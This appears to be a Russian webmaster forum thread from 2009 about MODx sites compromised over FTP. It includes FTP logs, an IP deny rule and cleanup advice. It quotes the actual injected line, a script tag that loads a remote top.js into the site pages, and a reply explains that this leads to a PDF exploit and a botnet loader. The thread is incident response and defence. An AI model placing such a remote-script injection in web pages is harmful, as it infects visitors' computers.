Что хотели сделать?

H8
На сайте с 24.10.2007
Offline
36
1179

Ситуация следующая: есть несколько сайтов на modx. Сегодня, после того, как не получилось зайти в админку и выяснения сложившейся ситуации с хостером, получил логи такого вида

Tue Jun 9 23:14:49 2009 0 217.116.8.82 5528 /home/логин/сайт2/www/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:14:49 2009 0 217.116.8.82 5614 /home/логин/сайт2/www/index.php a _ i r логин ftp 0 * c

Tue Jun 9 23:14:49 2009 0 217.116.8.82 873 /home/логин/сайт2/www/assets/index.html a _ o r логин ftp 0 * c

Tue Jun 9 23:14:53 2009 0 217.116.8.82 959 /home/логин/сайт2/www/assets/index.html a _ i r логин ftp 0 * c

Tue Jun 9 23:14:57 2009 0 217.116.8.82 38278 /home/логин/сайт2/www/manager/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:14:58 2009 0 217.116.8.82 38364 /home/логин/сайт2/www/manager/index.php a _ i r логин ftp 0 * c

Tue Jun 9 23:14:58 2009 0 217.116.8.82 1100 /home/логин/сайт3/www/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:14:58 2009 0 217.116.8.82 1186 /home/логин/сайт3/www/index.php a _ i r логин ftp 0 * c

Tue Jun 9 23:14:59 2009 0 217.116.8.82 4724 /home/логин/сайт4.ru/www/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:14:59 2009 0 217.116.8.82 4811 /home/логин/сайт4.ru/www/index.php a _ i r логин ftp 0 * c

Tue Jun 9 23:14:59 2009 0 217.116.8.82 70 /home/логин/сайт4.ru/www/assets/index.html a _ o r логин ftp 0 * c

Tue Jun 9 23:15:00 2009 0 217.116.8.82 157 /home/логин/сайт4.ru/www/assets/index.html a _ i r логин ftp 0 * c

Tue Jun 9 23:15:01 2009 0 217.116.8.82 37475 /home/логин/сайт4.ru/www/manager/index.php a _ o r логин ftp 0 * c

Tue Jun 9 23:15:02 2009 0 217.116.8.82 37562 /home/логин/сайт4.ru/www/manager/index.php a _ i r логин ftp 0 * c

и т.д. по всем сайтам.

После сравнения замененных файлов с исходными, оказалось, что все 3 отличаются только 1 добавленной строкой (была добавлена в самый конец всех файлов) -

<script LANGUAGE="javascript" SRC="http://www.difusionjuridica.es/img/top.js"></script>

p.s. если тема не в том разделе, прошу перенести

Himiko
На сайте с 28.08.2008
Offline
560
#1

Мой совет:

1. Проверьте свой компьютер на вирусы, а так же все компьютеры с которых был доступ к ftp.

2. Смените все пароли FTP.

3. Никогда не сохраняйте пароли в FTP-клиентах и лучше пароли переодически менять.

Так же можно закрыть доступ к FTP для всех ip-адресов, кроме своих.

Профессиональное администрирование серверов (https://systemintegra.ru). Круглосуточно. Отзывы (/ru/forum/834230) Лицензии (http://clck.ru/Qhf5) ISPManager,VDSManager,Billmanager e.t.c. по низким ценам.
H8
На сайте с 24.10.2007
Offline
36
#2
Himiko:
Мой совет:
1. Проверьте свой компьютер на вирусы, а так же все компьютеры с которых был доступ к ftp.
2. Смените все пароли FTP.
3. Никогда не сохраняйте пароли в FTP-клиентах и лучше пароли переодически менять.
Так же можно закрыть доступ к FTP для всех ip-адресов, кроме своих.

1 в процессе, 2 - уже сделано, как сделать запрет для чужих ip, оставив только свои?

мне ТП хостера вот такой вот файлик сделали:

.ftpaccess

<Limit ALL>

Deny from 217.116.8.82

</Limit>

Himiko
На сайте с 28.08.2008
Offline
560
#3

<Limit ALL>

Deny from 217.116.8.82

</Limit>

Это запрещает доступ с 1 ip-адреса.

Узнайте ip-адреса вашего провайдера и попросите хостера открыть доступ только для них. Для остальных пусть закроет. Ну и обновляйте антивирус регулярно)

ParserOff
На сайте с 02.03.2008
Offline
134
#4

По-моему, лучше запретить доступ всем, но разрешить со своего ip-адреса...

Himiko
На сайте с 28.08.2008
Offline
560
#5
ParserOff:
По-моему, лучше запретить доступ всем, но разрешить со своего ip-адреса...

Помоему, я это уже написал 😂

H8
На сайте с 24.10.2007
Offline
36
#6

Благодарю за советы, а какова цель данных действий? судя по тому, что был доступ по фтп, запросто могли повесить страничку "этот сайт взломал %nickname%", однако этого не сделали, а внедрили какой-то скрипт.

Himiko
На сайте с 28.08.2008
Offline
560
#7
Hran8:
Благодарю за советы, а какова цель данных действий? судя по тому, что был доступ по фтп, запросто могли повесить страничку "этот сайт взломал %nickname%", однако этого не сделали, а внедрили какой-то скрипт.

Это вирус. Возможно он заражает таким образом другие компьютеры с вашего сайта...

[Удален]
#8

Да обычный вирус. Так часто бывает. Чистите комп от вирусов.

hostmaster
На сайте с 26.05.2009
Offline
26
#9
Hran8:
Благодарю за советы, а какова цель данных действий? судя по тому, что был доступ по фтп, запросто могли повесить страничку "этот сайт взломал %nickname%", однако этого не сделали, а внедрили какой-то скрипт.

в страницу сайта внедрили невидимый iframe который вставляет код с другого сайта, код содержит javascript эксплуатирующий PDF уязвимость. Исполняется код который подгружает на зараженный компьютер так называемы лоадер. Пораженный комп становится частью ботнета.

I'm lost without tcpdump
WG
На сайте с 01.06.2009
Offline
6
WSG
#10

Кстати, как выяснили на днях, MODx уязвим и легко взламывается, при некоторых условиях.

Проверка безопасности сайтов (/ru/forum/361288), качественно и за адекватные деньги. Анализ сайта (http://wsg.su) на наличие уязвимостей.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий